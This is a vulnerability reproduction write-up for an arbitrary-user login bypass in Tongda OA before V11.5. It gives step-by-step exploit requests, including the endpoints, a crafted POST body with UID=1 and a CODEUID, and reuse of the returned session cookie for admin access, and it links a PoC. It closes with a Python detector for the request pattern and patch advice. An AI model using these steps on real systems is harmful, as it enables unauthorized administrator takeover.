1. Vulnerability description:
Tongda OA is an office automation (OA) system. Tongda OA officially released a security update on April 17. Analysis of that update shows that it fixes several high-risk vulnerabilities, including an arbitrary user login.
By constructing a malicious request, an attacker can bypass the login verification logic entirely and log in to the OA system as the system administrator.
2. Affected versions:
· Tongda OA 2017 edition
· Tongda OA V11.X < V11.5
3. Vulnerability reproduction:
1. Environment setup
1) Download Tongda OA V11.4:
https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe
2) Run the installer, then visit http://localhost
2. Vulnerability reproduction
1. Manual method:
1) Visit /ispirit/login_code.php to obtain the codeuid.
2) Access /logincheck_code.php, capturing and modifying the request at the same time: change the request method to POST and pass CODEUID together with the user's UID. The PHPSESSID in the response is the cached identity:
· Change the request method to POST
· Add the header: Content-Type: application/x-www-form-urlencoded
· Add the parameters: UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&
3) Use the cached identity to access the administrator back-end home page: /general/index.php?isIE=0&modify_pwd=0
2. Script method (requires a Python 3 environment):
1) Download the PoC from: https://github.com/NS-Sp4ce/TongDaOA-Fake-User
2) Use the script to obtain the SESSIONID:
3) Visit the management back-end home page, capture the request, and replace the cookie content with the PHPSESSID
Login successful:
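The bypass in the manual steps is decided entirely by what the client sends in the POST body to /logincheck_code.php, so a request-level check is where a defender can see it. The following is an added example, not code from this write-up or from the linked PoC repository: a small Python inspector modelling what a reverse proxy or WAF in front of the OA host sees, flagging a POST to /logincheck_code.php whose form body carries a client-chosen UID. The endpoint paths and parameter names are the ones from the steps above; the Request class, the sample traffic and the CODEUID placeholder are constructed, and the assumption that a normal QR-code login check never submits a UID field from the browser is mine and should be confirmed against real traffic before the rule is used to block rather than alert.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Endpoint path named in the write-up above.
LOGIN_CHECK_PATH = "/logincheck_code.php"


@dataclass
class Request:
    """Minimal view of one HTTP request as a reverse proxy or WAF would see it
    (constructed for this example)."""
    client: str
    method: str
    target: str                      # request-target: path plus optional query
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""

    @property
    def path(self) -> str:
        return urlsplit(self.target).path


def _header(req: Request, name: str) -> str:
    # Header names are case-insensitive; compare them case-folded.
    for k, v in req.headers.items():
        if k.lower() == name.lower():
            return v
    return ""


def client_supplied_fields(req: Request) -> Dict[str, List[str]]:
    """Parse the urlencoded form body into a dict of field -> values.
    Keys are upper-cased so UID/uid/Uid compare equal; that is a conservative
    choice for alerting, not a claim about how the application reads them."""
    ctype = _header(req, "Content-Type").split(";")[0].strip().lower()
    if ctype != "application/x-www-form-urlencoded":
        return {}
    fields: Dict[str, List[str]] = {}
    for k, v in parse_qs(req.body, keep_blank_values=True).items():
        fields.setdefault(k.upper(), []).extend(v)
    return fields


def inspect(req: Request) -> Optional[str]:
    """Return a finding for a request matching the bypass pattern described in
    the write-up (POST to /logincheck_code.php carrying a client-chosen UID),
    or None for anything else."""
    if req.method.upper() != "POST" or req.path != LOGIN_CHECK_PATH:
        return None
    fields = client_supplied_fields(req)
    if "UID" not in fields:
        return None
    uid = fields["UID"][0]
    with_code = "CODEUID" in fields
    return (f"{req.client}: POST {LOGIN_CHECK_PATH} with client-supplied UID={uid!r}"
            + (" and CODEUID" if with_code else "")
            + " (arbitrary-user login pattern)")


def scan(requests: List[Request]) -> List[str]:
    """Run inspect() over a batch of requests and keep only the findings."""
    return [f for f in (inspect(r) for r in requests) if f is not None]


FORM = {"Content-Type": "application/x-www-form-urlencoded"}
# Constructed sample traffic; the CODEUID value is a placeholder, not a real one.
SAMPLE_REQUESTS = [
    Request("10.0.0.5", "GET", "/ispirit/login_code.php"),
    Request("10.0.0.5", "POST", LOGIN_CHECK_PATH, FORM,
            "UID=1&CODEUID=_PC{CONSTRUCTED-CODEUID}&"),
    Request("10.0.0.5", "GET", "/general/index.php?isIE=0&modify_pwd=0"),
    # A check carrying only a CODEUID is assumed to be the normal QR-login flow.
    Request("10.0.0.9", "POST", LOGIN_CHECK_PATH, FORM,
            "CODEUID=_PC{CONSTRUCTED-CODEUID}"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Applying the April 17 update (V11.5 or later) remains the fix; the check above is for spotting exploitation attempts in traffic to hosts that have not yet been patched, and it only sees the decisive indicator because it inspects the request body, which a plain access log does not record.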